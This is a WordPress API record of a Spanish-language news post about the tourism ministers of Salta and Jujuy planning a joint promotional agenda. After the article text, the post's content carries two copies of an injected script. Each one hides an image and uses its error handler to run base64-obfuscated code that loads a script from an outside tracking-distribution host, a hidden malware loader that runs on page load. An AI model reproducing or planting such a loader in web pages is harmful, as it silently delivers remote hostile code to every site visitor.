{"id":4732,"date":"2025-01-06T09:48:50","date_gmt":"2025-01-06T12:48:50","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4732"},"modified":"2025-08-13T23:42:47","modified_gmt":"2025-08-14T02:42:47","slug":"salta-y-jujuy-diagraman-una-agenda-comun-para-potenciar-el-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4732","title":{"rendered":"Salta y Jujuy diagraman una agenda com\u00fan para potenciar el turismo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-c5cbd178f1b0921f55e8956a08e64303\" style=\"background-color:#5c051b\"><em>Ambos destinos tienen caracter\u00edsticas complementarias que facilitan el trabajo en conjunto, principalmente en la promoci\u00f3n nacional e internacional.<\/em><\/h4>\n\n\n\n<p>En una iniciativa destinada a fortalecer el turismo en el Norte argentino, la ministra de Turismo y Deportes de Salta,&nbsp;<strong>Manuela Arancibia<\/strong>, y el ministro de Cultura y Turismo de Jujuy,&nbsp;<strong>Federico Posadas<\/strong>, mantuvieron una reuni\u00f3n en la cual analizaron el contexto nacional para la actividad tur\u00edstica y establecieron pr\u00f3ximos encuentros tendientes a generar una agenda en com\u00fan.&nbsp;<\/p>\n\n\n\n<p>El objetivo principal es potenciar los destinos en el plano nacional e internacional, aprovechando las similitudes culturales, geogr\u00e1ficas y complementarias en lo tur\u00edstico.<\/p>\n\n\n\n<p>En Salta y Jujuy el turismo es una de las actividades econ\u00f3micas que m\u00e1s dinamizan el empleo y el surgimiento de peque\u00f1as y medianas empresas; potenciar esta industria es una decisi\u00f3n pol\u00edtica de ambos gobiernos.<\/p>\n\n\n\n<p>Otros temas tratados en el encuentro, es la promoci\u00f3n conjunta, puntualmente en mercados internacionales, la participaci\u00f3n en ferias europeas, el desarrollo de circuitos tur\u00edsticos integrados y la preservaci\u00f3n del patrimonio cultural y natural de ambas provincias.<\/p>\n\n\n\n<p>\u201cLa uni\u00f3n entre Salta y Jujuy no solo refuerza nuestra identidad como regi\u00f3n, sino que tambi\u00e9n nos posiciona con mayor fuerza en el escenario internacional, porque quienes vienen a una de estas dos provincias, invariablemente visitan y recorren la obra\u201d destac\u00f3 Manuela Arancibia.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ambos destinos tienen caracter\u00edsticas complementarias que facilitan el trabajo en conjunto, principalmente en la promoci\u00f3n nacional e internacional. En una iniciativa destinada a fortalecer el turismo en el Norte argentino, la ministra de Turismo y Deportes de Salta,&nbsp;Manuela Arancibia, y el ministro de Cultura y Turismo de Jujuy,&nbsp;Federico Posadas, mantuvieron una reuni\u00f3n en la cual [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4733,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-4732","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4732"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4732"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4732\/revisions"}],"predecessor-version":[{"id":6600,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4732\/revisions\/6600"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4733"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4732"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4732"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4732"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}